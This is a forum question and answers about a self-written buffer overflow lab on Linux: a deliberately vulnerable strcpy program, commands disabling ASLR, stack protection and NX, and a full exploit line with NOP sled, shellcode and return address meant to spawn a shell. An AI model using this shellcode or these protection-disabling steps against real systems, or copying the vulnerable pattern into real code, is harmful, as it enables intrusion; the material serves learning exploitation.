Buffer Overflow Should Work, But Gives SIGSEGV Error

Question

I was watching a tutorial on how to do a buffer overflow on linux. Everything was working great until I tried running the final thing. I searched and search on google but found nothing that worked.

My Buffer Overflow Exploitable C Code (exploitable.c):

#include <string.h>

int main(int argc, char** argv)
{
    char buf[500];
    strcpy(buf, argv[1]);
    return 0;
}

How I compiled:

1. I removed the randomization of the va_space (not really sure what it does, but I know that it allows for the buffer overflow): echo 0 > /proc/sys/kernel/randomize_va_space
2. I compiled using this command: gcc -fno-stack-protector -mpreferred-stack-boundary=2 -o exploitable exploitable.c

3. I ran it using gdb and figured out that this command should get me a /bin/bash shell:

   ./exploitable $(ruby -e 'print "\x90" * 212 + "\xbb\xac\x02\x93\xb0\xda\xdb\xd9\x74\x24\xf4\x5a\x29\xc9" + "\xb1\x0e\x31\x5a\x15\x83\xc2\x04\x03\x5a\x11\xe2\x59\x33" + "\x5a\x81\x7a\xc3\xbf\x52\xd8\xe1\xc0\xf9\x2b\xa2\x59\xaf" + "\x4d\x3a\x77\x33\x18\x5d\xef\x9c\x69\xca\xf0\x8a\xa2\x68" + "\x98\x24\x35\x8f\x08\x51\x4f\x50\xad\xa1\x60\x32\xc4\xcf" + "\x51\xd0\x77\x63\xc5\x14\x2f\xd0\x9c\xf4\x02\x56" + "\x90" * 210 + "\x44\xf1\xff\xbf"')

However this does not work.

Running it in gdb I find that the $eip was properly set to 0xbffff144(the middle of my first round of nops). For some reason this gives me a SIGSEGV error:

I don't know whether I have done something wrong or if there is one more fail safe I have to turn off.

Answer 1

You should make the stack executable. That could be part of your problem.

Also if you want a good reference on buffer overflows, I suggest reading Smashing the Stack for Fun and Profit

Answer 2

Perhaps gcc option (for the linker) -z execstack to disable NX.